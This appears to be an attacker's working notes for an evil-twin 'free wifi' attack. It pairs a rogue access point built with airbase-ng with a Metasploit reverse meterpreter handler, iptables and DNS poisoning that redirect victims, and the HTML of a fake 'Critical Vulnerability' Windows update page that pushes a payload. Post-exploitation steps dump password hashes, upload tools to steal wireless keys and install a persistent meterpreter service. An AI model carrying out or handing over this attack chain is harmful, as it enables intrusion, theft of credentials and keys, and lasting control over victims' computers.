- dhclient wlan0 //// Connect to the internet, can be eth0
- *****Setup metasploit listener********* ///// u need to create the meterpreter reverse_tcp connection --- information is available in many places http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable
- cd /
- cd pentest
- cd exploits
- cd framework3
- ./msfconsole
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 10.0.0.1
- set LPORT 55555
- show options
- exploit
- modprobe tun
- airbase-ng -P -C 30 -e "free wifi" wlan1 -v ////// can use various commands here
- *************************
- Transparent Airbase
- *************************
- su
- ***************
- ifconfig lo up
- ifconfig at0 up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address
- iptables -P FORWARD ACCEPT
- iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE wlan0 = route to the internet
- /etc/init.d/dhcp3-server restart // backtrack users use dhcpd
- /etc/init.d/lighttpd stop
- lighttpd -D -f '/home/hm/Desktop/http/http' //webserver with fake update page
- **********************************************************************
- direct any request to apache
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 //redirector
- **********************************************************************
- allow traffic again
- ifconfig lo up
- ifconfig at0 up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
- iptables -P FORWARD ACCEPT
- iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
- **************************************************************************
- **************************************************************************
- **************************************************************************
- NON Transparent Airbase
- su
- ***************
- modprobe tun
- airbase-ng -P -C 30 -e "free wifi" wlan1 -v
- su
- ***************
- ifconfig at0 up
- ifconfig lo up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
- iptables -P FORWARD ACCEPT
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
- /etc/init.d/dhcp3-server restart
- /etc/init.d/lighttpd stop
- lighttpd -D -f '/home/hm/Desktop/http/http'
- cd / /// dnspoison available at http://dnspentest.sourceforge.net/
- cd home
- cd hm
- cd Desktop
- cd dnspoison
- java ServerKernelMain 10.0.0.1 10.0.0.1
- ****************************************************************************
- **** Check for victims ********
- arp -n -v -i at0
- session - l
- session -i
- sysinfo
- getuid
- use priv
- hashdump
- ***download keys*****
- mkdir c:\\windows\\wkviewer4
- cd \
- cd windows
- cd wkviewer
- upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless key viewer
- upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... check below
- upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server
- upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
- upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server
- execute -H -f wkv.bat
- cat wkv.txt
- download wkv.txt /home/hm/Desktop/http/wkv.txt
- misc......
- wkv bat file =
- wkv.exe /stabular wkv.txt
- metsvc.exe install-service
- Index html -
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Untitled Document</title>
- <style type="text/css">
- <!--
- .style2 {
- font-family: Arial, Helvetica, sans-serif;
- font-weight: bold;
- font-size: 24px;
- color: #999999;
- }
- .style3 {
- font-family: Arial, Helvetica, sans-serif;
- color: #666666;
- font-weight: bold;
- }
- .style4 {
- font-family: Arial, Helvetica, sans-serif;
- color: #666666;
- font-weight: bold;
- font-size: 24px;
- }
- -->
- </style>
- <script src="/AC_RunActiveContent.js" type="text/javascript"></script>
- </head>
- <body>
- <p><img src="/udntitled.jpg" alt="t" width="1275" height="88" /></p>
- <p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
- <p align="center">
- <input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
- </p>
- <p align="center" class="style2"></p>
- <p> </p>
- <form id="form1" name="form1" method="post" action="/upgrade.exe">
- <label for="D"></label>
- </form>
- <p align="left" class="style4"> </p>
- </body>
- </html>